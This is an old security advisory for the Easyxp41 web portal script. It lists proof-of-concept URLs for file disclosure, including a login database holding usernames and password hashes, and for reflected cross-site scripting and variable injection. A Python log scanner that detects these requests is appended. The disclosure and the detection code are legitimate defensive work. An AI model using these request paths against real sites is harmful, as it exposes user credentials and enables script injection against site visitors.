XSS flaws and data disclosure in Easyxp41
################################################
XSS flaws and data disclosure in Easyxp41

vendor url: http://www.easypx41.be/
advisory: http://falcondeoro.blogspot.com/2005/07/xss-flaws-and-data-disclosure-in.html
vendor notify: Yes
exploit available: Yes
##################################################

Easyxp41 is a free script for building a web portal. It is very easy to run. Easyxp41 contains flaws that expose files directly, so their contents can be read by anyone.

###########
versions
###########
CMS full
CMS test

###############
Solution
###############
No solution at this time !!

###################
Timeline
###################
Discovered: 26-07-2005
Vendor notify: 29-07-2005
Disclosure: 29-07-2005

############
proof of concepts
############

################################################
information disclosure in /forum/ folder:
#########################################
http://[victim]/modules/forum/cfg/
http://[victim]/modules/forum/db/
http://[victim]/modules/forum/msg/
http://[victim]/modules/forum/admin/index.php
http://[victim]/modules/forum/msg/1103495330.dat

#############
information disclosure in /login/ folder:
#############
http://[victim]/modules/login/
http://[victim]/modules/login/login.php
http://[victim]/modules/login/admin/option.php
http://[victim]/modules/login/cfg/modules.cfg
http://[victim]/cfg/config.cfg
http://[victim]/mesdocuments/
http://[victim]/modules/news/

#############
Cross-site scripting & variable injections.
#############
http://[victim]/index.php?pg=&L=[variable-injection]&H=[variable-injection]
http://[victim]/index.php?pg=[change-url]&pgtype=iframe&L=500&H=500
http://[victim]/index.php?pg=modules/forum/viewtopic.php&Forum=Forum%20de%20démonstration.&msg=1103495330.dat&pgfull[variable-injection]
http://[victim]/index.php?pg=http://google.fr&pgtype=iframe&L=500&H=500
http://[victim]/index.php?pg=modules/forum/viewprofil.php&membres=[Code-XSS]
http://[victim]/index.php?pg=modules/forum/viewtopic.php&Forum=[Code-XSS]&pgfull
http://[victim]/index.php?pg=modules/forum/viewprofil.php&membres=[variable-injection]&pgfull[variable-injection]
http://[victim]/index.php?pg=modules/forum/viewprofil.php&membres=[variable-injection]

The Forum variable is not properly validated; combined with the open modules/forum/msg directory above, forum messages can be read from the PHP code without logging in:
http://[victim]/index.php?pg=modules/forum/viewtopic.php&Forum=[change-or-variable-injection].&msg=1103495330.dat&pgfull

##################
Disclosure of the names of the .dat files that hold the forum messages:
http://[victim]/modules/forum/db/rep.db

##########################
User name and password hash disclosure:
http://[victim]/modules/login/db/login.db

##########################
User email disclosure:
modules/login/db/login.db

#############################
End
##########################
Thanks to Lostmon for support (lostmon@gmail.com)
http://lostmon.blogspot.com/

--
Sincerely:
FalconDeOro (falcondeoro.blogspot.com)
Web-Blog: http://falcondeoro.blogspot.com
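As an added example (not part of the advisory or of Easyxp41), a small Python access-log scanner that flags the three request patterns the proof of concepts describe: direct reads of the cfg/db/msg files, index.php?pg= pointing at an external URL (the pgtype=iframe case), and script markup in the reflected forum parameters. The combined log format and the sample log lines are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit
# Files and folders the advisory shows as directly readable.
SENSITIVE_PATHS = ("/modules/login/db/login.db", "/modules/forum/db/rep.db",
                   "/cfg/config.cfg", "/modules/login/cfg/modules.cfg",
                   "/modules/forum/msg/", "/modules/forum/cfg/")
# index.php parameters the advisory shows reflected/injected without validation.
REFLECTED_PARAMS = ("membres", "Forum", "L", "H")
XSS_MARKERS = re.compile(r"<\s*(script|img|iframe|svg)|on\w+\s*=|javascript:", re.I)
# Apache/nginx "combined" access-log line (assumed format, not from the advisory).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<url>\S+)')

def classify(url):
    """Return finding labels for one request URL; empty list if it looks benign."""
    parts = urlsplit(url)
    path = unquote(parts.path)
    findings = []
    if any(path.startswith(p) for p in SENSITIVE_PATHS):
        findings.append("direct-file-disclosure")
    if path.endswith("/index.php"):
        qs = parse_qs(parts.query, keep_blank_values=True)
        for pg in qs.get("pg", []):
            # pg=http://...&pgtype=iframe loads an attacker-chosen page into the portal.
            if re.match(r"^[a-z][a-z0-9+.-]*://", pg, re.I) or pg.startswith("//"):
                findings.append("remote-include")
        for name in REFLECTED_PARAMS:
            if any(XSS_MARKERS.search(v) for v in qs.get(name, [])):
                findings.append(f"reflected-xss:{name}")
    return findings

def scan_log(lines):
    # Collect (client ip, label, url) for every suspicious request in the log lines.
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            hits.extend((m["ip"], label, m["url"]) for label in classify(m["url"]))
    return hits

# Constructed sample log lines (not from the advisory): one benign, three matching it.
SAMPLE_LOG = [
    '203.0.113.5 - - [29/Jul/2005:10:00:01 +0200] "GET /index.php?pg=modules/news/ HTTP/1.1" 200 1234',
    '203.0.113.5 - - [29/Jul/2005:10:00:02 +0200] "GET /modules/login/db/login.db HTTP/1.1" 200 512',
    '203.0.113.5 - - [29/Jul/2005:10:00:03 +0200] "GET /index.php?pg=http://example.com&pgtype=iframe&L=500&H=500 HTTP/1.1" 200 900',
    '203.0.113.5 - - [29/Jul/2005:10:00:04 +0200] "GET /index.php?pg=modules/forum/viewprofil.php&membres=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 777',
]

if __name__ == "__main__":
    for ip, label, url in scan_log(SAMPLE_LOG):
        print(f"{ip} {label} {url}")
```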